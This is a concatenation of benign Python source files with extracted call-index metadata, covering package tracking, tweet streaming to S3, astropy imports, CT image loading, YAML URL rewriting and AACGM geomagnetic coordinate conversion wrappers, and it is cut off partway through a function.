6512), False, 'import os\n'), ((5951, 5983), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5967, 5983), False, 'import os\n'), ((6157, 6189), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (6173, 6189), False, 'import os\n')] |
#!/usr/bin/env python
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import presence_of_element_located
import time
import os
from os.path import expanduser
import os.path
trackinglist = []
finaltrackinglist = []
path = (expanduser("~")+"/.package-track/bin")
with open("./trackingnumbers.txt", "r") as fileHandle:
for line in fileHandle:
current = line[:-1]
trackinglist.append(current)
for number in trackinglist:
# creating boolean flag to track if package was delivered
delivered = False
#printing tracking number
print(number)
#selenium
#runs in background
driver=webdriver
try:
fireFoxOptions = webdriver.FirefoxOptions()
fireFoxOptions.set_headless()
driver = webdriver.Firefox(firefox_options=fireFoxOptions)
except:
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.get("https://www.packagetrackr.com")
#print(driver.title)
#importing tracking list from csv
search = driver.find_element_by_name("n")
search.send_keys(number)
search.send_keys(Keys.ENTER)
time.sleep(5)
#waiting for new page to load
results = driver.find_elements_by_class_name("media-body")
for result in results:
# trying to remove listed number if item was delivered
if ("Delivered" in result.text):
delivered = True
# writing contents to new temp file
with open ('./tempfile.txt', 'w') as filehandle:
for result in results:
if ("WE KNOW WHERE YOUR STUFF IS." in result.text):
continue
filehandle.write('%s\n' % result.text)
# comparing the results of old and new files if old file exists
# returning difference to provide most accurate (recent) tracking info
try:
oldfile = open("./"+(number)+'.txt', "r+")
tempfile = open("./tempfile.txt", "r+")
old_dict = oldfile.readlines()
new_dict = tempfile.readlines()
oldfile.close()
tempfile.close()
#finding the difference between the two files
diff = [ x for x in new_dict if x not in old_dict ]
if diff:
print(diff[0].rstrip())
old_dict = new_dict
with open ("./"+(number)+'.txt', "w") as filehandle:
for line in old_dict:
filehandle.write('%s\n' % line.rstrip())
# if older version of the file isn't found, create it based on temp file
except:
with open("./"+(number)+'.txt', "w") as filehandle:
for result in results:
if ("WE KNOW WHERE YOUR STUFF IS." in result.text):
continue
filehandle.write('%s\n' % result.text)
print(result)
if (delivered):
print("package " + number + " was delivered, tracking number removed from list")
try:
os.remove("./"+ (number)+'.txt')
except:
pass
finaltrackinglist.append(number)
#updating tracking list txt file
with open ('./trackingnumbers.txt', 'w') as filehandle:
for item in finaltrackinglist:
filehandle.write('%s\n' % item)
#removing tempfile
try:
os.remove("./tempfile.txt")
os.remove("./tracking_from_email.txt")
except:
pass
#print("program complete!")
| [
"selenium.webdriver.chrome.options.Options",
"selenium.webdriver.Chrome",
"selenium.webdriver.Firefox",
"time.sleep",
"selenium.webdriver.FirefoxOptions",
"os.path.expanduser",
"os.remove"
] | [((461, 476), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (471, 476), False, 'from os.path import expanduser\n'), ((1431, 1444), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1441, 1444), False, 'import time\n'), ((3508, 3535), 'os.remove', 'os.remove', (['"""./tempfile.txt"""'], {}), "('./tempfile.txt')\n", (3517, 3535), False, 'import os\n'), ((3540, 3578), 'os.remove', 'os.remove', (['"""./tracking_from_email.txt"""'], {}), "('./tracking_from_email.txt')\n", (3549, 3578), False, 'import os\n'), ((911, 937), 'selenium.webdriver.FirefoxOptions', 'webdriver.FirefoxOptions', ([], {}), '()\n', (935, 937), False, 'from selenium import webdriver\n'), ((993, 1042), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'firefox_options': 'fireFoxOptions'}), '(firefox_options=fireFoxOptions)\n', (1010, 1042), False, 'from selenium import webdriver\n'), ((1080, 1089), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (1087, 1089), False, 'from selenium.webdriver.chrome.options import Options\n'), ((1157, 1204), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options'}), '(chrome_options=chrome_options)\n', (1173, 1204), False, 'from selenium import webdriver\n'), ((3208, 3241), 'os.remove', 'os.remove', (["('./' + number + '.txt')"], {}), "('./' + number + '.txt')\n", (3217, 3241), False, 'import os\n')] |
"""
Creates tweet stream using the geo coordinates of the latest
earthquake and uploads them to S3 bucket. If the latest earthquake
occured in Alaska, 'Not Available' is uploaded to the S3 bucket.
"""
import ast
import csv
import time
import boto3
import tweepy
import random
import json
class MyStreamListener(tweepy.StreamListener):
"""Modifies tweepy and the tweet stream functionality. Creates
csv file and saves the tweets to the file. Also, has a time limit
feature that closes the stream after time has elapsed."""
def __init__(self, time_limit: int):
"""
:param time_limit: int, seconds
"""
self.start_time = time.time()
self.limit = time_limit
self.saveFile = open('yourpath.csv', 'w', encoding='utf-8')
self._csv_writer = csv.writer(self.saveFile)
self._csv_writer.writerow(['Tweets', 'Coordinates'])
super(MyStreamListener, self).__init__()
def on_status(self, status):
print(status.text)
self._csv_writer.writerow([status.text, status.coordinates])
if self.check_time() is False:
return False
def check_time(self):
if time.time() > (self.start_time + self.limit):
return False
@property
def get_tweet_file(self):
return self.saveFile
def file_close(self):
self.saveFile.close()
def fetch_coordinates():
"""Fetches earthquake coordinates from s3 bucket. Coordinates
are returned as a list."""
cli = boto3.client('s3')
coordinate_object = cli.get_object(Bucket='xxx',
Key='<KEY>')
filedata = coordinate_object['Body'].read()
filedata = json.loads(filedata)
coordinates = ast.literal_eval(filedata['coordinate'])
return coordinates
def tweets_to_s3():
"""Uploads the tweet.csv file to the S3 Bucket"""
cli = boto3.client('s3')
cli.upload_file('yourpath.csv', Bucket='xxx',
Key='xxx.csv')
def alaska_check():
"""Retrieves json file containing the earthquake data. If Alaska is
is in 'city' True is returned. False is returned otherwise. """
cli = boto3.client('s3')
city_object = cli.get_object(Bucket='xxx',
Key='xxx.json')
filedata = city_object['Body'].read()
filedata = json.loads(filedata)
city = filedata['city']
if 'Alaska' in city:
return True
else:
return False
def main(event, context):
if alaska_check() is True:
saveFile = open('xxx', 'w', encoding='utf-8')
csv_writer = csv.writer(saveFile)
csv_writer.writerow(['Tweets'])
csv_writer.writerow(['Not Available in Area'])
saveFile.close()
tweets_to_s3()
else:
coordinates = fetch_coordinates()
auth = tweepy.OAuthHandler(consumer_key='xxx',
consumer_secret='xxx')
auth.set_access_token('xxx',
'xxx')
api = tweepy.API(auth)
try:
api.verify_credentials()
print('Okay')
except:
print("Credentials don't work")
tweet_stream = MyStreamListener(5)
myStream = tweepy.Stream(auth=api.auth, listener=tweet_stream)
print(myStream.filter(locations=coordinates))
tweet_stream.file_close()
tweets_to_s3()
return (print("Done!"))
main('d','d')
| [
"json.loads",
"boto3.client",
"tweepy.Stream",
"csv.writer",
"ast.literal_eval",
"tweepy.API",
"time.time",
"tweepy.OAuthHandler"
] | [((1514, 1532), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (1526, 1532), False, 'import boto3\n'), ((1701, 1721), 'json.loads', 'json.loads', (['filedata'], {}), '(filedata)\n', (1711, 1721), False, 'import json\n'), ((1740, 1780), 'ast.literal_eval', 'ast.literal_eval', (["filedata['coordinate']"], {}), "(filedata['coordinate'])\n", (1756, 1780), False, 'import ast\n'), ((1890, 1908), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (1902, 1908), False, 'import boto3\n'), ((2166, 2184), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (2178, 2184), False, 'import boto3\n'), ((2344, 2364), 'json.loads', 'json.loads', (['filedata'], {}), '(filedata)\n', (2354, 2364), False, 'import json\n'), ((671, 682), 'time.time', 'time.time', ([], {}), '()\n', (680, 682), False, 'import time\n'), ((810, 835), 'csv.writer', 'csv.writer', (['self.saveFile'], {}), '(self.saveFile)\n', (820, 835), False, 'import csv\n'), ((2603, 2623), 'csv.writer', 'csv.writer', (['saveFile'], {}), '(saveFile)\n', (2613, 2623), False, 'import csv\n'), ((2834, 2896), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', ([], {'consumer_key': '"""xxx"""', 'consumer_secret': '"""xxx"""'}), "(consumer_key='xxx', consumer_secret='xxx')\n", (2853, 2896), False, 'import tweepy\n'), ((3020, 3036), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (3030, 3036), False, 'import tweepy\n'), ((3235, 3286), 'tweepy.Stream', 'tweepy.Stream', ([], {'auth': 'api.auth', 'listener': 'tweet_stream'}), '(auth=api.auth, listener=tweet_stream)\n', (3248, 3286), False, 'import tweepy\n'), ((1178, 1189), 'time.time', 'time.time', ([], {}), '()\n', (1187, 1189), False, 'import time\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Astropy FLRW classes."""
from . import base, lambdacdm, w0cdm, w0wacdm, w0wzcdm, wpwazpcdm
from .base import * # noqa: F401, F403
from .lambdacdm import * # noqa: F401, F403
from .w0cdm import * # noqa: F401, F403
from .w0wacdm import * # noqa: F401, F403
from .w0wzcdm import * # noqa: F401, F403
from .wpwazpcdm import * # noqa: F401, F403
__all__ = (base.__all__ + lambdacdm.__all__ + w0cdm.__all__
+ w0wacdm.__all__ + wpwazpcdm.__all__ + w0wzcdm.__all__)
def __getattr__(attr):
"""Lazy import deprecated private API."""
base_attrs = ("H0units_to_invs", "a_B_c2", "critdens_const", "kB_evK",
"radian_in_arcmin", "radian_in_arcsec", "sec_to_Gyr")
if attr in base_attrs + ("quad", ) + ("ellipkinc", "hyp2f1"):
import warnings
from astropy.utils.exceptions import AstropyDeprecationWarning
from . import base, lambdacdm
msg = (f"`astropy.cosmology.flrw.{attr}` is a private variable (since "
"v5.1) and in future will raise an exception.")
warnings.warn(msg, AstropyDeprecationWarning)
if attr in base_attrs:
return getattr(base, "_" + attr)
elif attr == "quad":
return getattr(base, attr)
elif attr in ("ellipkinc", "hyp2f1"):
return getattr(lambdacdm, attr)
raise AttributeError(f"module {__name__!r} has no attribute {attr!r}.")
| [
"warnings.warn"
] | [((1118, 1163), 'warnings.warn', 'warnings.warn', (['msg', 'AstropyDeprecationWarning'], {}), '(msg, AstropyDeprecationWarning)\n', (1131, 1163), False, 'import warnings\n')] |
import nrrd
import nibabel as nib
import numpy as np
import pandas as pd
from algorithm.config import *
def load_img_dataset():
img_list = os.listdir(DATA_IMG_EXTENSION_PATH)
try:
img_list.remove('.DS_Store')
except:
print('Linux OS')
print('img file count: ', len(img_list))
pid_list = list(map(lambda x: x.split('-')[0], img_list))
df_img = pd.DataFrame({'pid': pid_list, 'file': img_list})
df_img = df_img.groupby(by=['pid'], axis=0, as_index=False).agg(['count', lambda x: ', '.join(x)])
df_img_valid = df_img[df_img['file']['count'] == 4]
df_img_invalid = df_img[df_img['file']['count'] != 4]
print('pid with 4 files: ', len(df_img_valid))
# df_img_invalid.to_csv('./error_img.csv', index=True)
return {'valid': df_img_valid, 'invalid': df_img_invalid}
def load_trg_label_dataset():
df_label = pd.read_excel(TRG_LABEL_PATH)
# filter invalid rows
df_label = df_label[df_label['wrong'].isna()]
df_label = df_label[-df_label['TRG'].isna()]
df_label = df_label[df_label['verify'] == 4]
df_label = df_label[['pid', 'TRG']]
# sort
df_label = df_label.sort_values(by=['pid'], axis=0)
return df_label
def load_os_label_dataset():
df_label = pd.read_excel(SURVIVAL_LABEL_PATH)
df_label = df_label.dropna()
# convert to 0/1
df_label['label'] = (df_label['survive'] == '是').astype(int)
df_label = df_label.drop(['survive'], axis=1)
# sort
df_label = df_label.sort_values(by=['pid'], axis=0)
return df_label
def load_ct_data(ct_id):
# load .nii image
try:
path = os.path.join(DATA_IMG_EXTENSION_PATH, ct_id + '.nii')
nib_object = nib.load(path)
image_data = nib_object.get_data()
# https://nipy.org/nibabel/coordinate_systems.html
scale_x = abs(nib_object.affine[0,0])
scale_y = abs(nib_object.affine[1,1])
assert(scale_x == scale_y)
scale_xy = scale_x
# permute axis and normalize ct scan
image_data = image_data.transpose(2, 0, 1)
image_data = normalize_ct(image_data)
return image_data, scale_xy
except:
pass
# load .nrrd image
try:
path = os.path.join(DATA_IMG_EXTENSION_PATH, ct_id + '.nrrd')
nrrd_object = nrrd.read(path)
image_data = np.array(nrrd_object[0])
spacing = nrrd_object[1]['space directions']
scale_x = abs(spacing[0,0])
scale_y = abs(spacing[1,1])
assert(scale_x == scale_y)
scale_xy = scale_x
print('Load through nrrd image by nrrd: ' + ct_id)
return image_data, scale_xy
except:
pass
raise ValueError({
'message': ERROR_IMAGE_OPEN,
'data': ct_id
})
def normalize_ct(image_data, normalize=False):
# set out of scan range from -3024 to -1024
image_data[image_data == -3024] = -1024
if normalize:
image_data = image_data / 1024 + 1
return image_data
| [
"nibabel.load",
"nrrd.read",
"numpy.array",
"pandas.read_excel",
"pandas.DataFrame"
] | [((388, 437), 'pandas.DataFrame', 'pd.DataFrame', (["{'pid': pid_list, 'file': img_list}"], {}), "({'pid': pid_list, 'file': img_list})\n", (400, 437), True, 'import pandas as pd\n'), ((877, 906), 'pandas.read_excel', 'pd.read_excel', (['TRG_LABEL_PATH'], {}), '(TRG_LABEL_PATH)\n', (890, 906), True, 'import pandas as pd\n'), ((1257, 1291), 'pandas.read_excel', 'pd.read_excel', (['SURVIVAL_LABEL_PATH'], {}), '(SURVIVAL_LABEL_PATH)\n', (1270, 1291), True, 'import pandas as pd\n'), ((1708, 1722), 'nibabel.load', 'nib.load', (['path'], {}), '(path)\n', (1716, 1722), True, 'import nibabel as nib\n'), ((2318, 2333), 'nrrd.read', 'nrrd.read', (['path'], {}), '(path)\n', (2327, 2333), False, 'import nrrd\n'), ((2355, 2379), 'numpy.array', 'np.array', (['nrrd_object[0]'], {}), '(nrrd_object[0])\n', (2363, 2379), True, 'import numpy as np\n')] |
# coding=utf-8
"""Módulo principal del programa.
La ejecución del programa debe comenzar en este módulo.
La función main() toma los argumentos ingresados, verifica la
configuración y ejecuta el módulo de configuración o el de inicio
de sesión según sea el caso.
"""
import argparse
from .config import config, is_configured
from .login import login
def main(args):
"""Función principal del programa."""
if args['config'] or not is_configured():
config()
else:
login()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sistema CRUD de campus UMC.')
parser.add_argument('--config', action='store_true',
help='Configura la conexión a MySQL')
args = parser.parse_args()
main(vars(args))
| [
"argparse.ArgumentParser"
] | [((543, 609), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sistema CRUD de campus UMC."""'}), "(description='Sistema CRUD de campus UMC.')\n", (566, 609), False, 'import argparse\n')] |
import yaml
import glob
import os
import sys
import requests
import argparse
from os import path, walk
from pathlib import Path
import pathlib
from urllib.parse import urlparse
def load_file(file_path):
with open(file_path, 'r', encoding="utf-8") as stream:
try:
file = list(yaml.safe_load_all(stream))[0]
except yaml.YAMLError as exc:
print(exc)
sys.exit("ERROR: reading {0}".format(file_path))
return file
def write_file(obj, file_path):
with open(os.path.join(os.path.dirname(__file__), '../datasets/', file_path), 'w+' ) as outfile:
yaml.dump(obj, outfile , default_flow_style=False, sort_keys=False)
def write_new_object(obj, relative_path, branch):
new_obj = obj.copy()
new_obj['dataset'] = []
for dataset in obj['dataset']:
a = urlparse(dataset)
data_file_name = os.path.basename(a.path)
new_obj['dataset'].append('https://media.githubusercontent.com/media/splunk/attack_data/' + branch + '/datasets/' + os.path.dirname(relative_path) + '/' + data_file_name)
write_file(new_obj, relative_path)
def load_objects(relative_path):
files = []
objs = []
manifest_files = os.path.join(os.path.dirname(__file__), '../', relative_path)
for file in sorted(glob.glob(manifest_files)):
p = pathlib.Path(file)
rel_path = str(pathlib.Path(*p.parts[2:]))
objs.append(load_file(file))
files.append(rel_path)
return objs, files
def convert_attack_data_objects(relative_path, branch):
attack_data_objs, attack_data_files = load_objects(relative_path)
counter = 0
for attack_data_obj in attack_data_objs:
write_new_object(attack_data_obj, attack_data_files[counter], branch)
counter += 1
def main(args):
parser = argparse.ArgumentParser(description="changes url links to datasets")
parser.add_argument("-b", "--branch", required=True, help="new branch")
args = parser.parse_args()
branch = args.branch
convert_attack_data_objects('datasets/attack_techniques/*/*/*.yml', branch)
convert_attack_data_objects('datasets/malware/*/*.yml', branch)
convert_attack_data_objects('datasets/suspicious_behaviour/*/*.yml', branch)
if __name__ == "__main__":
main(sys.argv[1:])
| [
"urllib.parse.urlparse",
"argparse.ArgumentParser",
"yaml.dump",
"pathlib.Path",
"yaml.safe_load_all",
"os.path.dirname",
"os.path.basename",
"glob.glob"
] | [((1810, 1878), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""changes url links to datasets"""'}), "(description='changes url links to datasets')\n", (1833, 1878), False, 'import argparse\n'), ((612, 678), 'yaml.dump', 'yaml.dump', (['obj', 'outfile'], {'default_flow_style': '(False)', 'sort_keys': '(False)'}), '(obj, outfile, default_flow_style=False, sort_keys=False)\n', (621, 678), False, 'import yaml\n'), ((832, 849), 'urllib.parse.urlparse', 'urlparse', (['dataset'], {}), '(dataset)\n', (840, 849), False, 'from urllib.parse import urlparse\n'), ((875, 899), 'os.path.basename', 'os.path.basename', (['a.path'], {}), '(a.path)\n', (891, 899), False, 'import os\n'), ((1217, 1242), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1232, 1242), False, 'import os\n'), ((1289, 1314), 'glob.glob', 'glob.glob', (['manifest_files'], {}), '(manifest_files)\n', (1298, 1314), False, 'import glob\n'), ((1329, 1347), 'pathlib.Path', 'pathlib.Path', (['file'], {}), '(file)\n', (1341, 1347), False, 'import pathlib\n'), ((1371, 1397), 'pathlib.Path', 'pathlib.Path', (['*p.parts[2:]'], {}), '(*p.parts[2:])\n', (1383, 1397), False, 'import pathlib\n'), ((531, 556), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (546, 556), False, 'import os\n'), ((301, 327), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (319, 327), False, 'import yaml\n'), ((1024, 1054), 'os.path.dirname', 'os.path.dirname', (['relative_path'], {}), '(relative_path)\n', (1039, 1054), False, 'import os\n')] |
# Copyright (C) 2019 NRL
# Author: <NAME>
# Disclaimer: This code is under the MIT license, whose details can be found at
# the root in the LICENSE file
#
# -*- coding: utf-8 -*-
"""Pythonic wrappers for AACGM-V2 C functions.
"""
import datetime as dt
import numpy as np
import os
import sys
import aacgmv2
import aacgmv2._aacgmv2 as c_aacgmv2
from aacgmv2._aacgmv2 import TRACE, ALLOWTRACE, BADIDEA
def test_time(dtime):
""" Test the time input and ensure it is a dt.datetime object
Parameters
----------
dtime : (unknown)
Time input in an untested format
Returns
-------
dtime : (dt.datetime)
Time as a datetime object
Raises
------
ValueError if time is not a dt.date or dt.datetime object
"""
if isinstance(dtime, dt.date):
# Because datetime objects identify as both dt.date and dt.datetime,
# you need an extra test here to ensure you don't lose the time
# attributes
if not isinstance(dtime, dt.datetime):
dtime = dt.datetime.combine(dtime, dt.time(0))
elif not isinstance(dtime, dt.datetime):
raise ValueError('time variable (dtime) must be a datetime object')
return dtime
def test_height(height, bit_code):
""" Test the input height and ensure it is appropriate for the method
Parameters
----------
height : (float)
Height to test in km
bit_code : (int)
Code string denoting method to use
Returns
-------
good_height : (boolean)
True if height and method are appropriate, False if not
Notes
-----
Appropriate altitude ranges for the different methods are explored in
Shepherd (2014). Summarized, they are:
Coefficients: 0-2000 km
Tracing: 0-1 Earth Radius
Altitudes below zero will work, but will not provide a good representation
of the magnetic field because it goes beyond the intended scope of these
coordiantes.
If you use the 'BADIDEA' code, you can bypass all constraints, but it
is a Bad Idea! If you include a high enough altiutde, the code may hang.
"""
# Test for heights that are allowed but not within the intended scope
# of the coordinate system. The routine will work, but the user should
# be aware that the results are not as reliable
if height < 0:
aacgmv2.logger.warning('conversion not intended for altitudes < 0 km')
# Test the conditions for using the coefficient method
if(height > aacgmv2.high_alt_coeff
and not (bit_code & (TRACE | ALLOWTRACE | BADIDEA))):
estr = ''.join(['coefficients are not valid for altitudes above ',
'{:.0f} km. You '.format(aacgmv2.high_alt_coeff),
'must either use field-line tracing (trace=True or',
' allowtrace=True) or indicate you know this is a',
' bad idea'])
aacgmv2.logger.error(estr)
return False
# Test the conditions for using the tracing method
if height > aacgmv2.high_alt_trace and not (bit_code & BADIDEA):
estr = ''.join(['these coordinates are not intended for the ',
'magnetosphere! You must indicate that you know ',
'this is a bad idea. If you continue, it is ',
'possible that the code will hang.'])
aacgmv2.logger.error(estr)
return False
return True
def set_coeff_path(igrf_file=False, coeff_prefix=False):
"""Sets the IGRF_COEFF and AACGMV_V2_DAT_PREFIX environment variables.
Parameters
----------
igrf_file : (str or bool)
Full filename of IGRF coefficient file, True to use
aacgmv2.IGRF_COEFFS, or False to leave as is. (default=False)
coeff_prefix : (str or bool)
Location and file prefix for aacgm coefficient files, True to use
aacgmv2.AACGM_V2_DAT_PREFIX, or False to leave as is. (default=False)
"""
# Define coefficient file prefix if requested
if coeff_prefix is not False:
# Use the default value, if one was not supplied (allow None to
# comply with depricated behaviour)
if coeff_prefix is True or coeff_prefix is None:
coeff_prefix = aacgmv2.AACGM_v2_DAT_PREFIX
if hasattr(os, "unsetenv"):
os.unsetenv('AACGM_v2_DAT_PREFIX')
else:
del os.environ['AACGM_v2_DAT_PREFIX']
os.environ['AACGM_v2_DAT_PREFIX'] = coeff_prefix
# Define IGRF file if requested
if igrf_file is not False:
# Use the default value, if one was not supplied (allow None to
# comply with depricated behaviour)
if igrf_file is True or igrf_file is None:
igrf_file = aacgmv2.IGRF_COEFFS
if hasattr(os, "unsetenv"):
os.unsetenv('IGRF_COEFFS')
else:
del os.environ['IGRF_COEFFS']
os.environ['IGRF_COEFFS'] = igrf_file
return
def convert_latlon(in_lat, in_lon, height, dtime, method_code="G2A"):
"""Converts between geomagnetic coordinates and AACGM coordinates
Parameters
----------
in_lat : (float)
Input latitude in degrees N (code specifies type of latitude)
in_lon : (float)
Input longitude in degrees E (code specifies type of longitude)
height : (float)
Altitude above the surface of the earth in km
dtime : (datetime)
Datetime for magnetic field
method_code : (str or int)
Bit code or string denoting which type(s) of conversion to perform
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default is "G2A")
Returns
-------
out_lat : (float)
Output latitude in degrees N
out_lon : (float)
Output longitude in degrees E
out_r : (float)
Geocentric radial distance (R_Earth) or altitude above the surface of
the Earth (km)
Raises
------
ValueError if input is incorrect
RuntimeError if unable to set AACGMV2 datetime
"""
# Test time
dtime = test_time(dtime)
# Initialise output
lat_out = np.nan
lon_out = np.nan
r_out = np.nan
# Set the coordinate coversion method code in bits
try:
bit_code = convert_str_to_bit(method_code.upper())
except AttributeError:
bit_code = method_code
if not isinstance(bit_code, int):
raise ValueError("unknown method code {:}".format(method_code))
# Test height that may or may not cause failure
if not test_height(height, bit_code):
return lat_out, lon_out, r_out
# Test latitude range
if abs(in_lat) > 90.0:
# Allow latitudes with a small deviation from the maximum
# (+/- 90 degrees) to be set to 90
if abs(in_lat) > 90.1:
raise ValueError('unrealistic latitude')
in_lat = np.sign(in_lat) * 90.0
# Constrain longitudes between -180 and 180
in_lon = ((in_lon + 180.0) % 360.0) - 180.0
# Set current date and time
try:
c_aacgmv2.set_datetime(dtime.year, dtime.month, dtime.day, dtime.hour,
dtime.minute, dtime.second)
except (TypeError, RuntimeError) as err:
raise RuntimeError("cannot set time for {:}: {:}".format(dtime, err))
# convert location
try:
lat_out, lon_out, r_out = c_aacgmv2.convert(in_lat, in_lon, height,
bit_code)
except Exception:
err = sys.exc_info()[0]
estr = "unable to perform conversion at {:.1f},".format(in_lat)
estr = "{:s}{:.1f} {:.1f} km, {:} ".format(estr, in_lon, height, dtime)
estr = "{:s}using method {:}: {:}".format(estr, bit_code, err)
aacgmv2.logger.warning(estr)
pass
return lat_out, lon_out, r_out
def convert_latlon_arr(in_lat, in_lon, height, dtime, method_code="G2A"):
"""Converts between geomagnetic coordinates and AACGM coordinates.
Parameters
----------
in_lat : (np.ndarray or list or float)
Input latitude in degrees N (method_code specifies type of latitude)
in_lon : (np.ndarray or list or float)
Input longitude in degrees E (method_code specifies type of longitude)
height : (np.ndarray or list or float)
Altitude above the surface of the earth in km
dtime : (datetime)
Single datetime object for magnetic field
method_code : (int or str)
Bit code or string denoting which type(s) of conversion to perform
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "G2A")
Returns
-------
out_lat : (np.ndarray)
Output latitudes in degrees N
out_lon : (np.ndarray)
Output longitudes in degrees E
out_r : (np.ndarray)
Geocentric radial distance (R_Earth) or altitude above the surface of
the Earth (km)
Raises
------
ValueError if input is incorrect
RuntimeError if unable to set AACGMV2 datetime
Notes
-----
At least one of in_lat, in_lon, and height must be a list or array.
If errors are encountered, NaN or Inf will be included in the input so
that all successful calculations are returned. To select only good values
use a function like `np.isfinite`.
Multi-dimensional arrays are not allowed.
"""
# Recast the data as numpy arrays
in_lat = np.array(in_lat)
in_lon = np.array(in_lon)
height = np.array(height)
# If one or two of these elements is a float, int, or single element array,
# create an array equal to the length of the longest input
test_array = np.array([len(in_lat.shape), len(in_lon.shape),
len(height.shape)])
if test_array.max() > 1:
raise ValueError("unable to process multi-dimensional arrays")
else:
if test_array.max() == 0:
aacgmv2.logger.info("".join(["for a single location, consider ",
"using convert_latlon or ",
"get_aacgm_coord"]))
in_lat = np.array([in_lat])
in_lon = np.array([in_lon])
height = np.array([height])
else:
max_len = max([len(arr) for i, arr in enumerate([in_lat, in_lon,
height])
if test_array[i] > 0])
if not test_array[0] or (len(in_lat) == 1 and max_len > 1):
in_lat = np.full(shape=(max_len,), fill_value=in_lat)
if not test_array[1] or (len(in_lon) == 1 and max_len > 1):
in_lon = np.full(shape=(max_len,), fill_value=in_lon)
if not test_array[2] or (len(height) == 1 and max_len > 1):
height = np.full(shape=(max_len,), fill_value=height)
# Ensure that lat, lon, and height are the same length or if the lengths
# differ that the different ones contain only a single value
if not (in_lat.shape == in_lon.shape and in_lat.shape == height.shape):
raise ValueError('lat, lon, and height arrays are mismatched')
# Test time
dtime = test_time(dtime)
# Initialise output
lat_out = np.full(shape=in_lat.shape, fill_value=np.nan)
lon_out = np.full(shape=in_lon.shape, fill_value=np.nan)
r_out = np.full(shape=height.shape, fill_value=np.nan)
# Test and set the conversion method code
try:
bit_code = convert_str_to_bit(method_code.upper())
except AttributeError:
bit_code = method_code
if not isinstance(bit_code, int):
raise ValueError("unknown method code {:}".format(method_code))
# Test height
if not test_height(np.nanmax(height), bit_code):
return lat_out, lon_out, r_out
# Test latitude range
if np.abs(in_lat).max() > 90.0:
if np.abs(in_lat).max() > 90.1:
raise ValueError('unrealistic latitude')
in_lat = np.clip(in_lat, -90.0, 90.0)
# Constrain longitudes between -180 and 180
in_lon = ((in_lon + 180.0) % 360.0) - 180.0
# Set current date and time
try:
c_aacgmv2.set_datetime(dtime.year, dtime.month, dtime.day, dtime.hour,
dtime.minute, dtime.second)
except (TypeError, RuntimeError) as err:
raise RuntimeError("cannot set time for {:}: {:}".format(dtime, err))
try:
lat_out, lon_out, r_out, bad_ind = c_aacgmv2.convert_arr(list(in_lat),
list(in_lon),
list(height),
bit_code)
# Cast the output as numpy arrays or masks
lat_out = np.array(lat_out)
lon_out = np.array(lon_out)
r_out = np.array(r_out)
bad_ind = np.array(bad_ind) >= 0
# Replace any bad indices with NaN, casting output as numpy arrays
if np.any(bad_ind):
lat_out[bad_ind] = np.nan
lon_out[bad_ind] = np.nan
r_out[bad_ind] = np.nan
except SystemError as serr:
aacgmv2.logger.warning('C Error encountered: {:}'.format(serr))
return lat_out, lon_out, r_out
def get_aacgm_coord(glat, glon, height, dtime, method="ALLOWTRACE"):
"""Get AACGM latitude, longitude, and magnetic local time
Parameters
----------
glat : (float)
Geodetic latitude in degrees N
glon : (float)
Geodetic longitude in degrees E
height : (float)
Altitude above the surface of the earth in km
dtime : (datetime)
Date and time to calculate magnetic location
method : (str)
String denoting which type(s) of conversion to perform
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "TRACE")
Returns
-------
mlat : (float)
magnetic latitude in degrees N
mlon : (float)
magnetic longitude in degrees E
mlt : (float)
magnetic local time in hours
"""
# Initialize method code
method_code = "G2A|{:s}".format(method)
# Get magnetic lat and lon.
mlat, mlon, _ = convert_latlon(glat, glon, height, dtime,
method_code=method_code)
# Get magnetic local time (output is always an array, so extract value)
mlt = np.nan if np.isnan(mlon) else convert_mlt(mlon, dtime, m2a=False)[0]
return mlat, mlon, mlt
def get_aacgm_coord_arr(glat, glon, height, dtime, method="ALLOWTRACE"):
"""Get AACGM latitude, longitude, and magnetic local time
Parameters
----------
glat : (np.array or list)
Geodetic latitude in degrees N
glon : (np.array or list)
Geodetic longitude in degrees E
height : (np.array or list)
Altitude above the surface of the earth in km
dtime : (datetime)
Date and time to calculate magnetic location
method : (str)
String denoting which type(s) of conversion to perform
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
